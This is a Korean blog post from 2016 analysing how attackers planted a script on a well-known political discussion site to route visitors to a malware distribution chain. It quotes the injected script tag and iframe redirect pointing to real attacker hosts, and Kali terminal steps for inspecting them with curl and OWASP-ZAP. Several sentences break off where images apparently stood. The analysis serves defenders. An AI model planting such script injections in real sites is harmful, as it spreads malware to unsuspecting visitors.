홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 웹해킹 사례: 유명 누리집을 악성코드 1차 경유지로 만들기악의적인 웹해킹(webhacking)의 방법과 목적은 크게 두 가지로 구분될 수 있을 것 같다. 첫째, 자동화 공격은 - 대량의 좀비서버를 확보하여 - DDoS 공격을 위한 봇넷(botnet) 구성에 사용된다. 둘째, 수작업으로 하는 공격은 - 접속자가 많은 유명 웹서버를 통한 - 악성코드 배포를 목적으로 한다. 이 글에서 언급하는 사례는 두번째 경우에 해당한다. 보안뉴스에 국내의 한 유명한 시국토론 누리집에서 악성스크립트가 발견되었다고 한다. 박근혜 대통령 탄핵과 같은 시대적 정치상황을 악용하는 해킹 사례이다. 아마도 해커들은 수동으로 해당 홈페이지에 침투하여 HTML 코드를 변경했을 것으로 보인다. 관련 기사
이 사례에서의 악성코드 배포 과정 살펴보기악성코드 배포를 위해서는 접속자가 많은 누리집에 HTML이나 자바스크립트를 심는다. 자바스크립트는 접속자를 악성코드 중간경유지에 접근하게 만든다. 중간경유지로 유도하는 자바스크립트가 심겨진 사이트를 1차 경유지라고 한다. 2차 이상의 중간 경유지에서는 취약점 존재여부를 스캔하는 코드가 실행된다고 한다. 먼저 보안뉴스의 기사를 살펴보자.
보안뉴스 기사를 살펴보면 쓰페빠.com의 HTML 소스를 갈무리한 그림이 있다. 이 그림에서 쓰레빠.com은 공개용 웹 게시판 소프트웨어인 XpressEngine을 사용하고 있다는 것을 알 수 있다. 공격자는 XE에서 알려지지 않은 취약점(제로데이 취약점)이나 취약한 관리자 비밀번호를 이용해서 홈페이지를 조작했을 가능성이 크다. 소스가 공개된 CMS들은 이러한 공격에 항상 노출될 가능성이 있다. 공개용 소프트웨어를 사용한다면 - 제로데이(0-day) 취약점은 대비할 수 없다고 하더라도 - 최소한 관리자 계정은 항상 안전하게 설정해야 한다. 그림에서, 공격자가 삽입한 코드는 다음과 같다. <script src="http://anttour.com/x.js"></script>
쓰레빠.com에 접속하는 모든 웹 브라우저는
root@kali:~# curl http://anttour.com/x.js //document.write("<iframe src='http://budygolf.com/img/index.html' width='60' height='1' frameborder='1'></iframe>");root@kali:~#
내용이 주석처리되어 있다(
Firefox의 HTTP 프록시를 OWASP-ZAP에 연결하였다.
그리고
"
http://budygolf.com/img/index.html http://budygolf.com/img/jquery.js http://budygolf.com/img/logo.swf
아마도 악성코드는 바로 이
위의 그림은
54개 중 11개의 백신 소프트웨어가 덧붙임
OWASP ZAP에서
다음과 같이 별도의 디렉토리에 이 파일을 풀어서 OWASP-ZAP으로 열면 그 내용을 확인할 수 있다. root@kali:~# owasp-zap 2&> /dev/null & [1] 38983 root@kali:~# cd Downloads/ root@kali:~/Downloads# mkdir tmp root@kali:~/Downloads# cd tmp/ root@kali:~/Downloads/tmp# tar xzvf ../budygolf-img-index-html.tgz budygolf-img-index-html.session budygolf-img-index-html.session.data budygolf-img-index-html.session.properties budygolf-img-index-html.session.script root@kali:~/Downloads/tmp#
압축해제가 완료되면, OWASP-ZAP에서
난독화된 javascript 분석이나 SWF 악성코드 분석에 도움이 될 수 있길 기대해본다. [처음 작성한 날: 2016.12.13] [마지막으로 고친 날: 2016.12.14] < 이전 글 : 경로재지정 취약점: 자바스크립트를 이용한 검증과 그 우회, 그리고 XSS (실제 사례) (2016.12.14) > 다음 글 : HTML 삽입, XSS 공격 탐지방법 (2016.12.11) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |